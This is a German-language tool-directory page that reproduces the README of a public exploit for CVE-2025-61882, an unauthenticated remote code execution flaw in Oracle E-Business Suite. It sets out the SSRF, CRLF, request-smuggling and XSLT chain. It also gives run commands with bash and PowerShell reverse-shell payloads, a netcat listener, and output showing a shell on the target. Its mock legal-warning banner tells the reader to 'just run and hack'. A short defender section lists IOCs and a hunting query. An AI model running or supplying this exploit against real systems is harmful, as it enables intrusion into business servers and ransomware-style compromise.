Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-61882-POC — Exploit für CVE-2025-61882, eine kritische Pre-Auth RCE in Oracle E-Business Suite. Kombiniert SSRF, CRLF-Injection, HTTP-Schmuggel und XSLT-Injection für unauthentifizierte Remote-Codeausführung. | Kitploit
Tools/GitHubGitHub/mindflarex/cve-2025-61882-poc
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingRemote-Access-Tool
GitHubmindflarex/cve-2025-61882-poc

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

CVE-2025-61882-POC

Exploit für CVE-2025-61882, eine kritische Pre-Auth RCE in Oracle E-Business Suite. Kombiniert SSRF, CRLF-Injection, HTTP-Schmuggel und XSLT-Injection für unauthentifizierte Remote-Codeausführung.

Repository anzeigen
2vor 3 MonatenNoch nicht geprüft
Teilen

CVE-2025-61882 Sicherheitstest-Tool

CVSS Status Platform License

🚨 KRITISCHE RECHTLICHE WARNUNG

Technische Details in unserem Blogbeitrag

DIESES WERKZEUG IST AUSSCHLIESSLICH FÜR AUTORISIERTE SICHERHEITSTESTS BESTIMMT

root@kitploit:~
╔══════════════════════════════════════════════════════════════╗
║                                                              ║
║  🚨 UNBERECHTIGTER ZUGRIFF AUF COMPUTERSYSTEME IST ILLEGAL 🚨   ║
║                                                              ║
║  Durch die Nutzung dieses Werkzeugs erkennen Sie an und      ║
║  stimmen zu, dass:                                           ║
║                                                              ║
║                                                              ║
║                 FCK THIS JUST RUN AND HACK                   ║
║                                                              ║
║                                                              ║
║                                                              ║
║                                                              ║
║                                                              ║
╚══════════════════════════════════════════════════════════════╝

📋 Übersicht

Sicherheitstest-Tool für CVE-2025-61882, eine kritische Pre-Authentifizierung-Remote-Code-Ausführungsschwachstelle, die Oracle E-Business Suite betrifft.

Erstellt von: Mindflare

Schwachstellendetails

  • CVE-ID: CVE-2025-61882
  • CVSS-Score: 9.8 (Kritisch)
  • Angriffsvektor: Netzwerk (nicht authentifiziert)
  • Angriffskomplexität: Mittel
  • Erforderliche Berechtigungen: Keine
  • Benutzerinteraktion: Keine
  • Betroffene Versionen: Oracle E-Business Suite 12.2.3 - 12.2.14
  • Patch-Status: Notfall-Patch veröffentlicht am 4. Oktober 2025
  • Ausnutzungsstatus: ⚠️ AKTIV AUSGENUTZT durch Cl0p-Ransomware seit August 2025

Technische Zusammenfassung

CVE-2025-61882 ist eine ausgeklügelte Exploit-Kette, die fünf verschiedene Schwachstellen kombiniert:

  1. SSRF - Server-Side Request Forgery über /OA_HTML/configurator/UiServlet
  2. CRLF-Injection - HTTP-Header-Injection im return_url-Parameter
  3. HTTP-Smuggling - Missbrauch von Keep-Alive-Verbindungen, um interne Dienste zu erreichen (Port 7201)
  4. Authentifizierungsumgehung - Path-Traversal über /OA_HTML/help/../-Präfix
  5. XSLT-Injection - Verarbeitung bösartiger XSL-Vorlagen führt zu RCE

🎯 Verwendungszwecke

✅ Zulässige Verwendung

  • Autorisierte Penetrationstests mit schriftlicher Genehmigung
  • Sicherheitsforschung an Systemen, die Ihnen gehören
  • Schwachstellenvalidierung in kontrollierten Laborumgebungen
  • Red-Team-Übungen mit ordnungsgemäßer Bereichsdokumentation
  • Akademische Forschung mit institutioneller Genehmigung
  • Incident-Response und forensische Analyse

❌ Verbotene Verwendung

  • Jeglicher unbefugter Systemzugriff
  • Testen von Systemen ohne ausdrückliche schriftliche Genehmigung
  • Bösartige Aktivitäten oder Schadensverursachung
  • Angriff auf Produktionssysteme ohne Genehmigung
  • Nutzung für kriminelle Zwecke
  • Jegliche Aktivitäten, die gegen geltendes Recht verstoßen

📦 Installation

Voraussetzungen

  • Python 3.7 oder höher
  • pip-Paketmanager
  • Netzwerkkonnektivität zum Ziel (nur autorisiert)
  • Netcat oder ähnlicher Listener zum Empfangen einer Reverse-Shell

Einrichtung

root@kitploit:~
# Repository klonen
git clone https://github.com/[IHR-BENUTZERNAME]/CVE-2025-61882-POC
cd CVE-2025-61882-POC

# Abhängigkeiten installieren
pip3 install -r requirements.txt

# Skript ausführbar machen (Linux/Mac)
chmod +x cve-2025-61882-detector.py

🚀 Verwendung

Schritt 1: Richten Sie Ihren Listener ein

Starten Sie in einem separaten Terminal einen Netcat-Listener:

root@kitploit:~
# Linux/Mac
nc -lvnp 4444

# Windows
nc.exe -lvnp 4444

Schritt 2: Führen Sie das Werkzeug aus

Grundlegende Verwendung (Linux-Ziel):

root@kitploit:~
python3 cve-2025-61882-detector.py \
  --target http://192.168.1.22:8000 \
  --lhost 192.168.1.10 \
  --lport 80 \
  --command 'bash -i >& /dev/tcp/192.168.1.10/4444 0>&1' \
  --platform linux

Windows-Ziel:

root@kitploit:~
python3 cve-2025-61882-detector.py \
  --target http://192.168.1.22:8000 \
  --lhost 192.168.1.10 \
  --lport 80 \
  --command 'powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient(\"192.168.1.10\",4444)"' \
  --platform windows

Parameter

ParameterBeschreibungErforderlichBeispiel
--targetZiel-URL der Oracle EBSJahttp://192.168.1.22:8000
--lhostIhre IP-Adresse (für Rückrufe)Ja192.168.1.10
--lportHTTP-Server-Port (stellt XSL-Payload bereit)Ja80 oder 8080
--commandAuszuführender Befehl auf dem ZielJaSiehe Beispiele oben
--platformZiel-Betriebssystem: linux oder windowsJalinux

📊 Beispielausgabe

Werkzeugausgabe

root@kitploit:~
[*] Target URL:    http://192.168.1.22:8000
[*] Listener IP:   192.168.1.10
[*] Listener Port: 80
[*] Platform:      linux

[*] HTTP server started on 192.168.1.10:80
[*] Connecting to target to retrieve CSRF token...
[*] CSRF TOKEN: WLDW-GNFH-MB4K-76EA-JB48-VY3X-L30R-NZT0
[*] Cooking HTTP smuggle stub...
[*] Sending exploit payload...
[*] Exploit payload sent successfully

[+] 192.168.1.22 - GET /OA_HTML/help/../ieshostedsurvey.xsl HTTP/1.1
[+] XSL payload served successfully

Netcat-Listener-Ausgabe (Wenn anfällig)

root@kitploit:~
ubuntu@attacker:~$ nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 192.168.1.22 30290
bash: no job control in this shell
[oracle@apps EBS_domain]$ id
uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall)
[oracle@apps EBS_domain]$

🛡️ Erkennung & Verteidigung

Für Sicherheitsverantwortliche

Sofortmaßnahmen

  1. Oracle-Notfall-Patch anwenden (Dokument-ID: 30061882.1)
  2. Nach Kompromittierung suchen:
    root@kitploit:~
    SELECT * FROM XDO_TEMPLATES_B 
    WHERE TEMPLATE_CODE LIKE 'TMP%' OR TEMPLATE_CODE LIKE 'DEF%';
    
  3. Zugriffsprotokolle seit August 2025 überprüfen
  4. Ausgehendes Internet von EBS-Servern blockieren

Erkennungsindikatoren

Netzwerk-IOCs:

root@kitploit:~
200.107.207.26 (Cl0p C2)
161.97.99.49 (Sekundär)

HTTP-Muster:

  • POST /OA_HTML/configurator/UiServlet
  • POST /OA_HTML/SyncServlet
  • GET /OA_HTML/help/../*.jsp
  • CRLF-Zeichen in Parametern

📚 Referenzen

  • Oracle Sicherheitswarnung
  • CISA KEV-Katalog
  • Google/Mandiant-Analyse
  • watchTowr Labs Forschung

📜 Lizenz

MIT-Lizenz mit Einschränkungen für Bildungszwecke – Siehe LIZENZ

HAFTUNGSAUSSCHLUSS: Diese Software ist nur für autorisierte Sicherheitstests bestimmt. Unbefugter Zugriff auf Computersysteme ist illegal. Der Autor übernimmt keine Haftung für Missbrauch.


root@kitploit:~

**Erstellt von:** Mindflare | **Zuletzt aktualisiert:** Oktober 2025
Tool herunterladen